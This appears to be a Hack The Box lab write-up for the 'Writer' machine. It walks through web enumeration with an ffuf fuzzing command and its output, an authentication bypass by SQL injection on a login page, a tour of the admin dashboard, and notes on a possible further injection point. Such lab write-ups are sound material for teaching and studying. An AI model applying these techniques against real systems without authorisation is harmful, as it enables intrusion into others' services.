Web
Nmap discovered a web server on the target port 80
The running service is Apache httpd 2.4.41
Webroot
It appears to be a journaling blog
There are 8 articles published by a number of authors who could be potential users
The footer shows the domain information
It’s been appended to the /etc/hosts file on Kali for local DNS resolution
The ABOUT button in the header points to /about, where it briefly explains about the website.
The admin user exists
While there is a input form located at /contact, it doesn’t appear to be functional
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/writer]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://writer.htb/FUZZ -ic -e .php,.txt,.html
________________________________________________
:: Method : GET
:: URL : http://writer.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .txt .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
about [Status: 200, Size: 3522, Words: 250, Lines: 75, Duration: 340ms]
contact [Status: 200, Size: 4905, Words: 242, Lines: 110, Duration: 330ms]
static [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 198ms]
logout [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 96ms]
dashboard [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 218ms]
administrative [Status: 200, Size: 1443, Words: 185, Lines: 35, Duration: 185ms]
server-status [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 91ms]Fuzzing the web server reveals an interesting directory
/administrative
It’s a login page
Wappalyzer identified that the web application is written in PHP
Both default and weak credentials failed
Attempting to bypass the authentication with SQLi
It worked and shows that I am being redirected to the dashboard page
/dashboard
/dashboard shows some information regarding the status of the website
The menu button opens up and reveals more button leading to configuration pages
/dashboard/users
It appears that the admin user is the only administrative user
While there is a search bar present, it doesn’t function by sending web requests, but responsive. So no SQLi
/dashboard/stories
While I am able to see and manage all the publications through /dashboard/stories, it was able to run some testing by adding a story as it features file upload
The code execution failed. Arbitrary file upload is not possible through here
/dashboard/settings
/dashboard/settings shows several options, yet none of these are functional
Vulnerability
At this point, the web application appeared to be not vulnerable as I went though pretty much every feature that /dashboard contains.
However, I have missed out something big prior
Authentication bypass through SQLi was confirmed to be present earlier. That’s how I was able to access resources at /dashboard
Then, the web server initially responses with a redirection page that shows Welcome Admin
That Admin might not be just static writing, but rather fetched from the backend SQL query and being displayed